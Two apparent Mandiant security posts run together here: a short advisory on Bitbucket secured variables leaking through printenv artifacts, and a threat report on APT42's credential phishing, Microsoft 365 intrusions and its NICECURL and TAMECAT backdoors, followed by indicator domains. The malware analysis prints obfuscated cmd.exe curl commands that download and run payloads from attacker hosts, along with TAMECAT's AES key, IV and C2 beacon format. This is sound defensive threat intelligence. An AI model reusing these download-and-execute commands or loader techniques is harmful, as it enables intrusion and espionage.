Exporting Secrets from Bitbucket in Plain Text

CI/CD pipelines are designed just like the plumbing in your house. Pipes, valves, and regulators all work in unison to provide you with reliable, running water. CI/CD pipelines are a complicated orchestration of events to accomplish a specific task. In order to accomplish this, these pipelines are highly proficient at packaging and deploying large volumes of data completely autonomously. As a developer, this creates countless possibilities for automating work, but, as a security professional, it can be a cause for anxiety and heartburn. Perhaps it's a line of code with a hardcoded secret sneaking into production. Maybe it's a developer accidentally storing secrets locally on their machine. Or maybe, as we have seen in recent investigations,  it's a Bitbucket artifact object containing secrets for an AWS environment being published to publicly available locations like S3 Buckets or company websites. 

Bitbucket secured variables are a convenient way to store secrets locally in Bitbucket for quick reference by developers; however, they come with one concerning characteristic—they can be exposed in plain text through artifact objects. If a Bitbucket variable—secured or not secured—is copied to an artifact object using the artifacts: command, the result will generate a .txt file with the value of that variable displayed in plain text. 

Mandiant has seen instances in which development teams used Bitbucket artifacts in web application source code for troubleshooting purposes, but, unbeknownst to the development teams, those artifacts contained plain text values of secret keys. This resulted in secret keys being exposed to the public internet where they were located and subsequently leveraged by attackers to gain unauthorized access.

Once a secured variable—such as an AWS Key—is copied to a .txt file in plain text, the secret has been leaked, and it's up to the pipeline as to where that secret flows and how long until an attacker finds it.

Reproducing the Secret Leak

The following are steps to recreate the secret leak in a Bitbucket environment. One important note—the commands detailed in this guide illustrate only one possibility, but there are several other methods that export secured variables to artifacts in Bitbucket. Administrators and developers should closely review any references to artifact objects in their bitbucket-pipelines.yml file or any other files in the repository. 

Establish Secured Variables in Bitbucket

This can be done at the repository level or the workspace level as long as they are set to "secured variable."

Update the bitbucket-pipelines.yml File to Create an Environment Artifact

The following lines of code execute the command printenv to copy all environment variables from Bitbucket to a .txt file called environment_variables.txt. This is a common practice in development when troubleshooting because developers need to review a wide range of variables for legitimate development purposes. Once the .txt file is created, the code passes it to a Bitbucket artifact object where it can be used by future stages in the pipeline, if necessary.

Navigate to the Pipeline Execution History and Download the Artifact Open the Artifact and Search for Secured Variables

After exporting the .txt file, secrets can be read in plain text among all the variables in the Bitbucket environment. One note on this step—it is possible you will need to extract components of a .tar file as an additional step here. In this event, extract the .tar file using your data extraction tool of choice.

Secrets Flow Where the Pipeline Goes

Once the secrets are printed to the environment_variables.txt file, they are free to flow out of Bitbucket through the pipeline and become exposed. Any combination of development mistakes, malicious intent, or accidental disclosure can lead to secret exposure and misuse by a threat actor. 

Recommendations

Bitbucket Pipelines is a great platform for storing, collaborating, and deploying code. Bitbucket, however, is not a dedicated secrets manager, and storing secrets directly in Bitbucket introduces opportunities for secrets to be leaked. Safely protect your secrets when using Bitbucket Pipelines by:

• Storing secrets in a dedicated secrets manager and then referencing those variables in the code stored in your Bitbucket repository
• Closely reviewing Bitbucket artifact objects to ensure they are not exposing secrets as plain text files
• Deploying code scanning throughout the full lifecycle of your pipeline to catch secrets stored in code before they are deployed to production

Conclusion

This is not an indictment against Bitbucket. Instead, it's a case study in how seemingly innocuous actions can snowball into serious problems. We use the word "leak" for a specific reason. All it takes is one keystroke, one line of code, or one misconfiguration for a slow, seemingly untraceable drip of secrets to flow through your pipeline out into the world.

Written by: Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, Jonathan Leathery

 

APT42, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain access to victim networks, including cloud environments. The actor is targeting Western and Middle Eastern NGOs, media organizations, academia, legal services and activists. Mandiant assesses APT42 operates on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).

APT42 was observed posing as journalists and event organizers to build trust with their victims through ongoing correspondence, and to deliver invitations to conferences or legitimate documents. These social engineering schemes enabled APT42 to harvest credentials and use them to gain initial access to cloud environments. Subsequently, the threat actor covertly exfiltrated data of strategic interest to Iran, while relying on built-in features and open-source tools to avoid detection.

In addition to cloud operations, we also outline recent malware-based APT42 operations using two custom backdoors: NICECURL and TAMECAT. These backdoors are delivered via spear phishing, providing the attackers with initial access that might be used as a command execution interface or as a jumping point to deploy additional malware.

APT42 targeting and missions are consistent with its assessed affiliation with the IRGC-IO, which is a part of the Iranian intelligence apparatus that is responsible for monitoring and preventing foreign threats to the Islamic Republic and domestic unrest.

APT42 activities overlap with the publicly reported actors CALANQUE (Google Threat Analysis Group), Charming Kitten (ClearSky and CERTFA), Mint Sandstorm/Phosphorus (Microsoft), TA453 (Proofpoint), Yellow Garuda (PwC), and ITG18 (IBM X-Force).

Figure 1: APT42 operations

Fake News, Real Credentials: Harvesting Microsoft, Yahoo, and Google Credentials

APT42 is known for its extensive credential harvesting operations that are often accompanied by tailored spear-phishing campaigns and extensive social engineering. APT42 credential harvesting operations typically include three steps, described in the Figure 2.

Figure 2: APT42 credential harvesting campaign attack lifecycle

Mandiant identified at least three clusters of infrastructure used by APT42 to harvest credentials from targets in the policy and government sectors, media organizations and journalists, and NGOs and activists. The three clusters employ similar tactics, techniques and procedures (TTPs) to target victim credentials (spear-phishing emails), but use slightly varied domains, masquerading patterns, decoys, and themes.

A full list of the infrastructure is available in the Indicators of Compromise (IOCs) section.

Cluster A: Posing as News Outlets and NGOs

• Active: 2021 – today
• Suspected Targeting: credentials of journalists, researchers, and geopolitical entities in regions of interest to Iran. 
• Masquerading as: The Washington Post (U.S.), The Economist (UK), The Jerusalem Post (IL), Khaleej Times (UAE), Azadliq (Azerbaijan), and more news outlets and NGOs. This often involves the use of typosquatted domains like washinqtonpost[.]press.
  
  Mandiant did not observe APT42 target or compromise these organizations, but rather impersonate them.
• Attack vector: Malicious links from typo-squatted domains that are masquerading as news articles likely sent via spear phishing, redirecting the user to fake Google login pages.

Figure 3: Jerusalem Post journalist warns of spear-phishing emails sent on her behalf

Cluster B: Posing as Legitimate Services

• Active: 2019 – today

• Targeting: individuals perceived as a threat to the Iranian regime, including researchers, journalists, NGO leaders, and human rights activists.

• Masquerading as: generic login pages, file hosting services, and YouTube. The domains use TLDs like .top, .online, .site and .live, and often contain several words separated by hyphens, like panel-live-check[.]online.
• Attack vector: legitimate links sent via spear phishing, posing as invitations to conferences or legitimate documents hosted on cloud infrastructure. Upon entry, the user is prompted to enter their credentials, which are sent to the attackers.

Mandiant observed several instances of APT42 using Cluster B domains to harvest credentials and host decoy files:

• In March 2023, APT42 deployed the domain ksview[.]top in an attempt to redirect to honest-halcyon-fresher[.]buzz, which hosts a fake Gmail login page targeting a freelance journalist, indicating these campaigns are highly tailored to their targets.

Figure 4: Fake Gmail login page used by APT42

• In March 2023, APT42 sent a spear-phishing email with a fake Google Meet invitation, allegedly sent on behalf of Mona Louri, a likely fake persona leveraged by APT42, claiming to be a human rights activist and researcher. Upon entry, the user was presented with a fake Google Meet page and asked to enter their credentials, which were subsequently sent to the attackers.

Figure 5: Twitter account of Mona Louri, a likely fake persona leveraged by APT42

• The fake page was hosted on Google Sites (sites[.]google[.]com) webpage creation tool to enhance its legitimacy, and had a reference to a dedicated APT42 domain embedded in its HTML contents, as can be observed in Figure 6 and Figure 7. This activity was also publicly mentioned on Twitter.

Figure 6: Fake Google Meet page deployed by APT42

Figure 7: APT42 domain embedded in the fake Google Meet page HTML contents

• From November through December 2023, APT42 targeted the media and non-profit sectors via spear-phishing emails that included the shortened link of the URL shortening service “n9[.]cl,” which redirected victims to a likely credential harvesting page mimicking Google Drive using the domain “review[.]modification-check[.]online” while others included a link to the same domain without the shortener. The actor additionally shared a benign file via Google Drive as part of this campaign.
• In February 2024, Mandiant observed the APT42 domain nterview[.]site redirecting to the domain admin-stable-right[.]top, which hosted a fake Gmail login page, to target the credentials of a women’s rights activist. The domain nterview[.]site was also observed redirecting to a women’s rights-themed lure allegedly sent by “Jamileh Nedai” (possibly referring to the Iranian filmmaker and women’s rights activist).
  • The lure, named “Questionnaire.pdf,” is a PDF document hosted on Dropbox with the headline “Women’s Struggles and Protest.” The document was created by “David Webb,” possibly referring to the Fox News contributor. We have no indication of this individual being targeted by APT42, but rather being spoofed by them, possibly to enhance the decoy's legitimacy.

Figure 8: APT42 lure shared via Dropbox (left) containing women’s rights-related content (right)

• In March 2024, APT42 used the domain shortlinkview[.]live, which redirects to panel-view[.]live, in a campaign targeting a news editor working in a Persian-language news television channel. The final redirection hosts a fake Gmail login page.
• During March 2024, APT42 also used the domain reconsider[.]site to redirect users to a decoy document hosted on Dropbox named “The Secrets of Gaza Tunnels” (titled both in Hebrew and in English), likely leveraging the Israel-Hamas war.

Figure 9: Decoy document titled “The secrets of Gaza Tunnels” used by APT42

• At the same time, APT42 also used the domain reconsider[.]site to redirect users to last-check-leave[.]buzz and target Google, Microsoft, and Yahoo credentials. This effort was focused on targeting researchers and academia personnel in the U.S., Israel, and Europe.

Figure 10: Fake Yahoo and Hotmail login page used by APT42

• In addition, Mandiant also observed APT42 deploy fake YouTube login pages and URL shortener pages, likely disseminated via phishing:

Figure 11: Fake YouTube login page hosted on an APT42 domain

Figure 12: Fake URL shortener page hosted on multiple APT42 domains

Cluster C: Posing as “Mailer Daemon,” URL Shortening Services and NGOs

• Active: 2022 – today
• Targeting: individuals and entities affiliated with various defense, foreign affairs, and academic issues in the U.S. and Israel.
  • Specifically, in November 2023, Mandiant observed this cluster targeting a nuclear physics professor in a major Israeli university, by using the following phishing URL likely masquerading as a legitimate Microsoft 365 login:

hxxps://email-daemon[.]online/<university_acronym>365[.]onmicrosofl[.]com/accountID=<target_handle>

• Masquerading as: NGOs, “Mailer Daemon,” and Bitly URL shortening service.
• Attack vector: legitimate links likely sent via spear phishing, posing as invitations to conferences or legitimate documents hosted on cloud infrastructure. Upon entry, the user is prompted to enter their credentials, which are sent to the attackers.

In these cases, Mandiant observed APT42 encode targets or lures using “1337” (leet) writing. For example, the name of Tamir Pardo (the former head of the Israeli Mossad) was represented in the url hxxps://bitly[.]org[.]il/t4m1rpa by replacing "a" with 4 and "i" with 1.

• APT42 likely attempted to use lures related to the International Counter-Intelligence summit (“ICT-2023”) conducted in Israel, by deploying the following URLs:
  • hxxps://bitly[.]org[.]il/J03p4y3r
  • hxxps://youtransfer[.]live/ICT-2023/J03py3r

Head(er) In The Cloud: Targeting Microsoft 365 Environments

As an extension of their aforementioned credential harvesting operations, during 2022–2023, Mandiant observed APT42 exfiltrate documents of interest to Iran and sensitive information from the victims’ public cloud infrastructure. These victims were located in the U.S. and the UK in the legal services and NGO sectors. However, since the initial enabler of these operations lies with credential harvesting, which APT42 conducts worldwide, it is possible the victimology is much wider.

These operations began with enhanced social engineering schemes to gain the initial access to victim networks, often involving ongoing trust-building correspondence with the victim. Only then the desired credentials are acquired and multi-factor authentication (MFA) is bypassed, by serving a cloned website to capture the MFA token (which failed) and later by sending MFA push notifications to the victim (which succeeded). 

These techniques have allowed APT42 to covertly access and compromise the victim’s Microsoft 365 environment, relying on built-in features and open-source tools to decrease their chances of being detected.

Figure 13: APT42 cloud operations attack lifecycle

APT42 cloud operations attack lifecycle can be described in details as follows:

• Social engineering schemes involving decoys and trust building, which includes masquerading as legitimate NGOs and conducting ongoing correspondence with the target, sometimes lasting several weeks. 
  • The threat actor masqueraded as well-known international organizations in the legal and NGO fields and sent emails from domains typosquatting the original NGO domains, for example aspenlnstitute[.]org.
    • The Aspen Institute became aware of this spoofed domain and collaborated with industry partners, including blocking it in SafeBrowsing, thus protecting users of Google Chrome and additional browsers.
    • To increase their credibility, APT42 impersonated high-ranking personnel working at the aforementioned organizations when creating the email personas.
  • APT42 enhanced their campaign credibility by using decoy material inviting targets to legitimate and relevant events and conferences. In one instance, the decoy material was hosted on an attacker-controlled SharePoint folder, accessible only after the victim entered their credentials. Mandiant did not identify malicious elements in the files, suggesting they were used solely to gain the victim’s trust.

Figure 14: APT42 controlled SharePoint folder containing PDF lures

• Credential harvesting and bypassing MFA. Only after a certain level of trust was built with the victim, APT42 harvested the desired credentials by sending the victim a link that would redirect them to a credential harvesting site, similar to the process described in the previously discussed credential theft section. 
  • Mandiant observed the use of Javascript files to redirect victims from these links to ultimately serve fake Microsoft 365 login pages.
  • At least once, Mandiant observed APT42 use several methods—both SharePoint login and fake LinkedIn login pages—to target multiple high-profile personnel of the victim organization during the same campaign.

Figure 15: APT42 fake LinkedIn login page

• • Mandiant observed APT42 deploy two methods to bypass MFA: First, APT42 made attempts to acquire MFA tokens by using fake DUO pages, using subdomains with prefixes such as “api-<generated_id>[.]...” or using words like “duo”. When this failed, the actor sent authentication prompts to victims upon attempts to login, which succeeded. 
    
    In a different intrusion, APT42 likely served a phishing site to capture the MFA token sent via SMS and leveraged the KMSI (Keep-me-Signed-In) feature to avoid reauthentication.
  • In at least one instance, APT42 established a “persistent” login mechanism leveraging the Microsoft app password feature, likely in attempts to preserve ongoing access for future logins without the need to re-verify their identity with MFA.
    • Microsoft’s app password feature is intended to be used with applications or devices that do not support MFA, and thus generates single-use passwords that do not require MFA. The feature is not enabled by default, and can be activated manually. Once this feature is enabled, any logged in user can create app passwords.
    • APT42 leveraged the fact that the app password feature was enabled to create an app password for the compromised account. However, Mandiant has no indication that APT42 actually used it.

Figure 16: Microsoft app password settings, exploited by APT42 for continuous MFA bypass

• Covert exfiltration of data from the Microsoft 365 environment, including OneDrive documents, Outlook emails, and documents of potential interest to Iran including files pertaining its foreign affairs or the Persian Gulf region.
  
  The M365 infiltration and data exfiltration included the following stages:
  • Logging in to the victim email using Thunderbird email client, whose usage was approved by the attacker altering the user permissions.
  • Logging into the victim’s Citrix application and using Windows Remote Desktop Protocol (RDP). Upon entry, the attackers explored, enumerated, and staged files for exfiltration in password-protected 7-ZIP archives.
    • The attacker performed host, network, and directory reconnaissance using Windows native commands including:
      
      "whoami," "net view," "cd," "explorer," "net share," "hostname," "ls," "type," "ping," "net user," "gci," "mkdir," "notepad," "mv," "exit," "rm," "dir," and "del."

• • • The attacker used PowerShell cmdlets including "set-ExecutionPolicy," "Import-Module," and "Invoke-HuntSMBShares," a cmdlet from the open-source tooling module PowerHuntShares that can identify users with excessive network share permissions.
  • Searching for specific files and data of interest to Iran. For example, in one of the intrusions, APT42 searched for specific Iran-related documents with details about foreign affairs issues, as was observed on collected data from the Windows Registry Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths. In another intrusion, Mandiant observed APT42 browsing for files related to the Middle East as well as the Ukraine war.

Figure 17: APT42 cloud operations flow of attack

APT42 deployed multiple defense evasion techniques to minimize their intrusion footprint:

• Relying on built-in features of the Microsoft 365 environment and publicly available tools. This serves as double functionality to harden attribution based on tooling and to blend in the environment, while it shows an increase in adaptability.
• Clearing Google Chrome browser history after reviewing documents of interest.
• Attempting (and possibly succeeding) to exfiltrate files to a OneDrive account masquerading as the victim’s organization, using the fake email address <victim_org_name>@outlook[.]com. APT42 also browsed and downloaded files from the victim’s OneDrive to disk, likely to access files of interest. 
• Using anonymized infrastructure to interact with the victim’s environment, including ExpressVPN nodes, Cloudflare-hosted domains, and ephemeral VPS servers. 

Despite the previously listed defense evasion techniques, Mandiant was able to attribute the cloud operations to APT42 based on the usage of domains overlapping with APT42 credential harvesting operations and the very specific Iran-related nature of intelligence collected by the actor. 

APT42 Malware-Based Operations

Mandiant tracks several APT42 campaigns using custom malware. Most recently, Mandiant observed APT42 deploy two custom backdoors, TAMECAT and NICECURL. Both of these backdoors were delivered with decoy content (likely via spear phishing) and provide APT42 operators with initial access to the targets. The backdoors provide a flexible code-execution interface that may be used as a jumping point to deploy additional malware or to manually execute commands on the device.

Mandiant estimates APT42 used these backdoors to target NGOs, government, or intergovernmental organizations around the world, handling issues related to Iran and the Middle East, consistent with APT42 targeting profile.

Malware Family

Description

NICECURL

A backdoor written in VBScript that can download additional modules to be executed, including data mining and arbitrary command execution

TAMECAT

A PowerShell toehold that can execute arbitrary PowerShell or C# content

Table 1: APT42 Malware Families

NICECURL

NICECURL is a backdoor written in VBScript that can download additional modules to be executed, including a datamining module, and it provides an arbitrary command execution interface. The backdoor’s accepted commands include "kill" to remove artifacts and end execution, "SetNewConfig" to set a new sleep value, and "Module" to download and execute additional files, potentially extending NICECURL's functionality. NICECURL communicates over HTTPS.

In January 2024, Mandiant observed a malicious LNK file downloading NICECURL and a PDF decoy that masqueraded as an Interview Feedback Form of the Harvard T.H. Chan School of Public Health (Figure 18). The decoy mentions an interviewee by the name of Daniel Serwer, possibly referring to the scholar and foreign policy researcher by the same name, affiliated with the Middle East Institute. It is noteworthy that Mandiant has no indication these entities were targeted or compromised, but merely spoofed by APT42 decoys.

Figure 18: PDF decoy

The LNK file onedrive-form.pdf.lnk (MD5: d5a05212f5931d50bb024567a2873642) is downloaded from hxxps://drive-file-share[.]site/OneDrive-Form.pdf.lnk. This file was uploaded to the C2 on January 14, 2024.

Figure 19: NICECURL LNK file hosted on drive-file-share[.]site

The LNK file contains the following command to download and execute the NICECURL from prism-west-candy[.]glitch[.]me (the original command is defanged):

cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d \"id=CgYEFk &Prog=2_Mal_vbs.txt&WH=Form.pdf\" -X PO7ST hxxps:// prism-west-candy[.]glitch[.]me/Down -o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt \"\" \"%temp%\\down.v7bs\" & call %b:7=%

In February 2024, Mandiant identified another NICECURL sample named kuzen.vbs (MD5: 347b273df245f5e1fcbef32f5b836f1d), which connects to worried-eastern-salto[.]glitch[.]me and downloads a decoy file, question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757), about Empowering Women for Peace from an American think tank specializing in U.S. foreign policy and international relations (Figure 20).

Figure 20: Decoy file question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757)

According to the contents of the decoy file, the attack possibly happened in January or the beginning of February 2024 and targeted a victim located in Australia.

Mandiant also observed a similarly named encrypted RAR file named “question_Empowering Women for Peace Gender Equality in Conflict Prevention and Resolution (6).rar” (MD5: 13aa118181ac6a202f0a64c0c7a61ce7). This RAR file shares the same name with the decoy PDF and likely targeted the same victim. 

This infection chain was previously documented by Volexity.

TAMECAT 

In March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold that can execute arbitrary PowerShell or C# content. TAMECAT is dropped by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant previously observed TAMECAT used in a large-scale APT42 spear-phishing campaign targeting individuals or entities employed by or affiliated with NGOs, government, or intergovernmental organizations around the world.

TAMECAT Execution

Execution begins with a small VBScript downloader that leverages Windows Management Instrumentation (WMI) to query anti-virus products running on the victim's system. Depending on the script determining if Windows Defender is running, differing download commands and URLs are used.

If Windows Defender is running, the script will leverage conhost to execute a PowerShell command that uses Wget to download content at the following URL: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt.

For all other cases, the script uses Cmd.exe to execute a Curl command that is similar to Curl commands used in the NICECURL execution chain previously described:

cmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d ""i1=aaaa&EF1=2m.txt&WF1=test.pdf"" -X PO9ST hxxp://tnt200[.]mywire[.]org/Do1 -o %temp%\2m.v9bs & call %c:9=% & set b=sta9rt """" ""%temp%\2m.v9bs"" & call %b:9=%

• a2.vbs (MD5: d7bf138d1aa2b70d6204a2f3c3bc72a7)
  • Downloads: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt (MD5: 081419a484bbf99f278ce636d445b9d8)
    • TAMECAT loader
  • Downloads: hxxp://tnt200[.]mywire[.]org/Do1
    • Content not available
    • Possibly downloads malware from NICECURL ecosystem

Figure 21: a2.vbs content

The downloaded script, nconf.txt (MD5: 081419a484bbf99f278ce636d445b9d8), is a PowerShell script that contains an obfuscated and AES-encrypted TAMECAT backdoor. The script also downloads an additional PowerShell that is used to AES decrypt the embedded TAMECAT backdoor.

When downloading the AES decryption script, the following hard-coded User-agent string is used:

• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

It is noteworthy that the script contains a unique TAMECAT key value T2r0y1M1e1n1o0w1 that was used in a previously reported TAMECAT sample observed in June 2023 (MD5: dd2653a2543fa44eaeeff3ca82fe3513), further indicating the two samples belong to the same malware family. However, the unique value is not used in the script.

The script stores the URL for the AES decryption script as a Base64 string where the first three characters are truncated and the remaining string is Base64 decoded: 

• pepaHR0cHM6Ly9zMy50ZWJpLmlvL2ljZXN0b3JhZ2UvZGYzMnMudHh0
  • Decodes to: hxxps://s3[.]tebi[.]io/icestorage/df32s.txt
• The script stored at this URL is df32s.txt (MD5: c3b9191f3a3c139ae886c0840709865e)

The response content is Base64 decoded and also further decoded using a routine that does the following:

• Inverts the bits of each byte within an array named $bytesOfRes
• Extracts the least significant byte (8 bits) from the inverted representation
• Converts the extracted byte back into a numerical byte value

Once decoded, the resulting PowerShell function resembles the following:

Figure 22: Decoded df32s.txt

The decoded script is a function that is mainly used to AES decrypt parameters that are passed to it. In addition, it defines global variables including a C2 domain, which are used by the TAMECAT backdoor that gets decrypted and executed.

The following AES key and IV are used to decrypt content:

• AES Key: kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B
• AES IV: 0T9r1y1M2e0N0o1w

The parent script uses the AES decrypt function to decode Base64, and AES decrypts the following string that is contained in the parent script:

v+UDXK47mBGgYqTbOXjXVD6MzhZenTfVf6CKxQFp2+AiPHMvmA2a4IiBz4rOi8ffxWdXFtrPk6
UABw1b6oBPsW1VV/HNU0mf8jH7xsoBAHY5Sp6vdYc7WGZ6SYO72KIH/hOyBlS5wc7Y86wJ
R9naW+0nINCYZV6RyD5t/fDpqEoRYW6dHwoebLECkEck/N5C1jhlFHaoS51QKSfgraHI5iRiT6p
fpqUNeJHbYz3VYuo/j2FZ6f5BCJgXoHKPmf4pUSwSZH0qQSa98blmdAH+tG7jc3AUE76IHx4x
kzxAldO/4b97duoI6rm+Ucy3rRHHrVnPQ0TvvTvudD/LDBwn3DkNcKSTDvEQDwIgni/MU7BOw
klcE1+qQjabXTGr+CrL0c53dNA4OGNYkBAnLokjcoNxKmxbCSK3oSdFEz2+htgPMOjq14IGoPS
OWcPX2CVK

Once decrypted, additional PowerShell is revealed that appends together a string obfuscated within nconf.txt, and AES decrypts the string. The decrypted results are the TAMECAT backdoor.

Borjol($wvp[5]+$xme[2]+$nwk[3]+$vrl[3]+$gzk[4]+$ni2[0]+$tkk[2]+$kq4[0]+$yoe[4]+$jwv[0]+
$ywa[0]+$sxi[5]+$bw9[12]+$kgu[1]+$mdi[0]+$ruz[3]+$byh[3]+$sja[3]+$wqf[0]+$wof[2]+$mg
4[1]+$rfi[5]+$dt9[11]+$qgv[9]+$jt5[0]+$lli[1]+$owd[4]+$lp2[6]+$wkb[2]+$zen[7]+$sro[0]+$ta8
[0]+$kg9[0]+$esk[8]+$ci4[5]+$oyx[0]+$ico[1]+$xy9[1]+$vvl[0])

The TAMECAT backdoor initially writes a likely victim identifier to the following location: %LOCALAPPDATA%\config.txt.

The TAMECAT backdoor makes an initial POST request to the globally defined C2 domain: hxxps://accurate-sprout-porpoise[.]glitch[.]me. 

The initial POST request contains information like the following, which are AES encrypted and Base64 encoded:

{
    "rwsdjfxsdf": [
        {
            "num": "1"
        },
        {
            "OS": "<os_caption>"
        },
        {
            "ComputerName": "<computer_name>"
        },
        {
            "Token": "<value_from_configtxt>"
        }
    ]
}

The TAMECAT backdoor AES encrypts the content using the key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B and a randomly generated 16-character IV, generated from the string ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. The randomly generated IV is added to the POST request in a header called Content-DPR. The AES key is not transmitted to the C2, so it is likely the same AES key is used for multiple victims. 

If the response is successful, it is also expected to contain a header named Content-DPR, which is expected to house an IV used with the aforementioned AES key to decrypt the response data.

The decrypted response data is split by the paragraph symbol (¶) into four values:

• Language
• Command
• ThreadName
• StartStop

The available commands appear mostly the same as previously identified TAMECAT samples:

Variable

Value

Description

$language

powershell or csharp 

Interpret command value as PowerShell or CSharp code

$StartStop

downloadutils or start or stop

Download additional content, start command with parameters, stop command

Table 2: Available commands

Outlook and Implications

APT42 has remained relatively focused on intelligence collection and targeting similar victimology, despite the Israel-Hamas war that has led other Iran-nexus actors to adapt by conducting disruptive, destructive, and hack-and-leak activities. 

In addition to deploying custom implants on compromised devices, APT42 was also observed conducting extensive cloud operations. In cloud environments not vulnerable to implants, APT42 relies on social engineering to harvest credentials and collect intelligence of strategic interest to Iran. Credential abuse was also emphasized as a common initial access vector to cloud environments in the latest Google Cloud Threat Horizons report.

The methods deployed by APT42 leave a minimal footprint and might make the detection and mitigation of their activities more challenging for network defenders. The TTPs, IOCs, and provided rules included in this blog post may support detection and mitigation efforts.

For Google Chronicle Enterprise+ customers, Chronicle rules have been released to your Emerging Threats rule pack, and IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence. In addition, the IOCs listed in this blog post are blocked in Safe Browsing, protecting Google Chrome users, as well as other browsers.

Indicators of Compromise (IOCs)

A VirusTotal Collection featuring IOCs related to the APT42 activity described in this post is now available for registered users.

Credential Harvesting and Cloud-Based Operations

Domain

Organization 

Country 

Cluster A

News Outlets

azadlliq[.]info 

Azadliq 

Azerbaijan 

businesslnsider[.]org 

Business Insider 

U.S. 

ecomonist[.]org

The Economist

UK

eocnomist[.]com

The Economist

UK

foreiqnaffairs[.]com 

Foreign Affairs 

U.S. 

forieqnaffairs[.]com

Foreign Affairs 

U.S. 

foreiqnaffairs[.]org

Foreign Affairs 

U.S. 

israelhayum[.]com

Israel Hayom

Israel

jpost[.]press 

Jerusalem Post 

Israel 

jpostpress[.]com 

Jerusalem Post 

Israel 

khaleejtimes[.]org 

Khaleej Times

UAE 

khalejtimes[.]org 

Khaleej Times

UAE 

maariv[.]net 

Maariv 

Israel 

themedealine[.]org 

The Media Line 

U.S. 

timesfisrael[.]com

Times Of Israel

Israel

vanityfaire[.]org

Vanity Fair

U.S.

washinqtonpost[.]press 

The Washington Post 

U.S. 

ynetnews[.]press 

Ynet 

Israel 

Legitimate Services

account-signin[.]com

Google/Microsoft

N/A

acconut-signin[.]com

Google/Microsoft

N/A

accounts-mails[.]com

Google/Microsoft

N/A

coordinate[.]icu

Generic

N/A

dloffice[.]top

Microsoft

N/A

dloffice[.]buzz

Microsoft

N/A

myaccount-signin[.]com

Google/Microsoft

N/A

signin-acconut[.]com

Google/Microsoft

N/A

signin-accounts[.]com

Google/Microsoft

N/A

signin-mail[.]com

Google/Microsoft

N/A

signin-mails[.]com

Google/Microsoft

N/A

signin-myaccounts[.]com

Google/Microsoft

N/A

support-account[.]xyz

Google/Microsoft

N/A

Cluster B

Generic Login Services

accredit-validity[.]online

Generic

N/A

activity-permission[.]online

Generic

N/A

admin-stable-right[.]top

Generic

N/A

admiscion[.]online

Generic

N/A

admit-roar-frame[.]top

Generic

N/A

advission[.]online

Generic

N/A

affect-fist-ton[.]online

Generic

N/A

avid-striking-eagerness[.]online

Generic

N/A

beaviews[.]online

Generic

N/A

besvision[.]top

Generic

N/A

bloom-flatter-affably[.]top

Generic

N/A

book-download[.]shop

Generic

N/A

bq-ledmagic[.]online

Generic

N/A

briview[.]online

Generic

N/A

chat-services[.]online

Generic

N/A

check-online-panel[.]live

Generic

N/A

check-pabnel-status[.]live

Generic

N/A

check-panel-status[.]live

Generic

N/A

check-panel-status[.]live

Generic

N/A

check-short-panel[.]live

Generic

N/A

confirmation-process[.]top

Generic

N/A

connection-view[.]online

Generic

N/A

continue-meeting[.]site

Generic

N/A

continue-recognized[.]online

Generic

N/A

cvisiion[.]online

Generic

N/A

drive-access[.]site

Generic

N/A

endorsement-services[.]online

Generic

N/A

fortune-retire-home[.]top

Generic

N/A

geaviews[.]site

Generic

N/A

glory-uplift-vouch[.]online

Generic

N/A

go-conversation[.]lol

Generic

N/A

go-forward[.]quest

Generic

N/A

gview[.]site

Generic

N/A

home-continue[.]online

Generic

N/A

home-proceed[.]online

Generic

N/A

identifier-direction[.]site

Generic

N/A

indication-service[.]online

Generic

N/A

join-paneling[.]online

Generic

N/A

ksview[.]top

Generic

N/A

last-check-leave[.]buzz

Generic

N/A

live-project-online[.]live

Generic

N/A

live-projects-online[.]top

Generic

N/A

loriginal[.]online

Generic

N/A

mail-roundcube[.]site

Generic

N/A

meeting-online[.]site

Generic

N/A

mterview[.]site

Generic

N/A

nterview[.]site

Generic

N/A

online-processing[.]online

Generic

N/A

online-video-services[.]site

Generic

N/A

ovcloud[.]online

Generic

N/A

panel-check-short[.]live

Generic

N/A

panel-check-short[.]live

Generic

N/A

panel-live-check[.]online

Generic

N/A

panel-short-check[.]live

Generic

N/A

panel-view-short[.]online

Generic

N/A

panel-view[.]live

Generic

N/A

panel-view[.]online

Generic

N/A

panel-views-cheking[.]live

Generic

N/A

panelchecking[.]live

Generic

N/A

paneling-viewing[.]live

Generic

N/A

panels-views-ckeck[.]live

Generic

N/A

pannel-get-data[.]us

Generic

N/A

quomodocunquize[.]site

Generic

N/A

recognize-validation[.]online

Generic

N/A

reconsider[.]site

Generic

N/A

revive-project-live[.]online

Generic

N/A

short-url[.]live

Generic

N/A

short-view[.]online

Generic

N/A

shortenurl[.]online

Generic

N/A

shortingurling[.]live

Generic

N/A

shortlinkview[.]live

Generic

N/A

shortulonline[.]live

Generic

N/A

shorting-ce[.]live

Generic

N/A

shoting-urls[.]live

Generic

N/A

simple-process-static[.]top

Generic

N/A

status-short[.]live

Generic

N/A

stellar-roar-right[.]buzz

Generic

N/A

sweet-pinnacle-readily[.]online

Generic

N/A

tcvision[.]online

Generic

N/A

title-flow-store[.]online

Generic

N/A

twision[.]top

Generic

N/A

ushrt[.]us

Generic

N/A

verify-person-entry[.]top

Generic

N/A

view-cope-flow[.]online

Generic

N/A

view-panel[.]live

Generic

N/A

view-pool-cope[.]online

Generic

N/A

